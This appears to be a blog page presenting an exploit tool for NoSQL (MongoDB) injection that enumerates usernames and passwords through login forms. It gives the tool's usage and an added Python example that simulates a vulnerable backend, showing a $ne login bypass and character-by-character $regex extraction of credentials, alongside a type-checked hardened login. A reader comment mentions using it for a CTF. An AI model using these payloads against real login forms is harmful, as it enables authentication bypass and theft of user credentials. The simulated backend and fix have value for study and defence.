NoSQL injection username and password enumeration

Using this script, we can enumerate usernames and passwords of web applications that are vulnerable to NoSQL (MongoDB) injection through their login form.

Exploit Title: NoSQL injection username/password enumeration.
Author: Kalana Sankalpa (Anon LK).

Github repo:

How to run

Usage [-h] [-u URL] [-up parameter] [-pp parameter] [-op parameters] [-ep parameter] [-sc character] [-m Method]


python -u -up username -pp password -ep username -op login:login,submit:submit


Arguments Description
-h, --help show this help message and exit
-u URL Form submission URL. Eg:
-up parameter Parameter name of the username. Eg: username, user
-pp parameter Parameter name of the password. Eg: password, pass
-op parameters Other parameters with their values. Separate each parameter with a comma (,).
Eg: login:Login, submit:Submit
-ep parameter Parameter to enumerate. Eg: username, password
-m Method HTTP method of the form. Eg: GET/POST
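The page does not say which MongoDB operators the script injects, so what follows is an added, self-contained Python example, not the author's tool, of the technique such an enumerator relies on. It assumes a login form whose parsed body (with bracketed keys such as username[$regex]) is passed straight into a MongoDB find() query; that backend is simulated in-process with a constructed user store and a tiny evaluator for the $regex and $ne operators, so it runs offline. The enumerator recovers a username and then that account's password one character at a time with anchored regular expressions, and the hardened login beside it shows the type check that defeats the attack. All names, accounts and the alphabet are assumptions made for the example.

```python
import re

# Constructed sample user store standing in for a MongoDB collection (assumption).
USERS = [
    {"username": "admin", "password": "s3cret!"},
    {"username": "bob", "password": "hunter2"},
]

# Characters tried at each position; extend for a real target (assumption).
ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789!_-"


def parse_form(pairs):
    """Parse form fields the way extended body parsers do:
    ('username[$regex]', '^a') becomes {'username': {'$regex': '^a'}}."""
    doc = {}
    for key, value in pairs:
        m = re.fullmatch(r"(\w+)\[(\$\w+)\]", key)
        if m:
            doc.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            doc[key] = value
    return doc


def match_field(stored, cond):
    """Subset of MongoDB query semantics: plain equality, $regex and $ne."""
    if isinstance(cond, dict):
        for op, arg in cond.items():
            if op == "$regex":
                if re.search(arg, stored) is None:
                    return False
            elif op == "$ne":
                if stored == arg:
                    return False
            else:
                return False  # unsupported operator never matches
        return True
    return stored == cond


def vulnerable_login(pairs):
    """Vulnerable: the parsed request body is used directly as the query document,
    so operator objects supplied by the client reach the database."""
    q = parse_form(pairs)
    return any(match_field(u["username"], q.get("username"))
               and match_field(u["password"], q.get("password")) for u in USERS)


def hardened_login(pairs):
    """Fixed: only scalar strings are accepted, then compared for equality."""
    q = parse_form(pairs)
    user, pw = q.get("username"), q.get("password")
    if not isinstance(user, str) or not isinstance(pw, str):
        return False
    return any(u["username"] == user and u["password"] == pw for u in USERS)


def enumerate_field(login, field, extra, max_len=32):
    """Recover the value of `field` one character at a time with anchored $regex
    payloads. `extra` carries the other form fields, e.g. password[$ne]= to bypass
    the password check, or username=admin to pin the enumeration to one account.
    Returns None when no character matches, which is what the hardened login yields."""
    known = ""
    for _ in range(max_len):
        # Fully anchored check: is the prefix found so far the complete value?
        if login([(f"{field}[$regex]", f"^{re.escape(known)}$")] + extra):
            return known
        for ch in ALPHABET:
            if login([(f"{field}[$regex]", f"^{re.escape(known + ch)}")] + extra):
                known += ch
                break
        else:
            return None
    return None


if __name__ == "__main__":
    bypass = [("username[$ne]", ""), ("password[$ne]", "")]
    print("vulnerable bypass:", vulnerable_login(bypass))
    user = enumerate_field(vulnerable_login, "username", [("password[$ne]", "")])
    print("username:", user)
    print("password:", enumerate_field(vulnerable_login, "password", [("username", user)]))
    print("hardened bypass:", hardened_login(bypass))
    print("hardened enum:", enumerate_field(hardened_login, "username", [("password[$ne]", "")]))
```

On the wire each probe is an ordinary form body such as username[$regex]=^ad&password[$ne]=, and the oracle is simply whether the login succeeds; a real enumerator would send that body with the -m method to the -u URL, with the -op fields appended. The fully anchored ^value$ check at the top of each round is what tells the script the value is complete rather than a prefix of a longer one.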

[Screenshot from 2019-11-14 16-40-11]

[Screenshot from 2019-11-14 16-38-32]

2 thoughts on “NoSQL injection username and password enumeration”

  1. Hey man, this article just helped me in solving my CTF. This is great, but all I want to know is how you found that payload. I mean, I looked at every payload from PayloadsAllTheThings and fired requests in Burp accordingly, but all I get is a 200 status code. Please reply, I am very fond of knowing this. Thanks, pal.
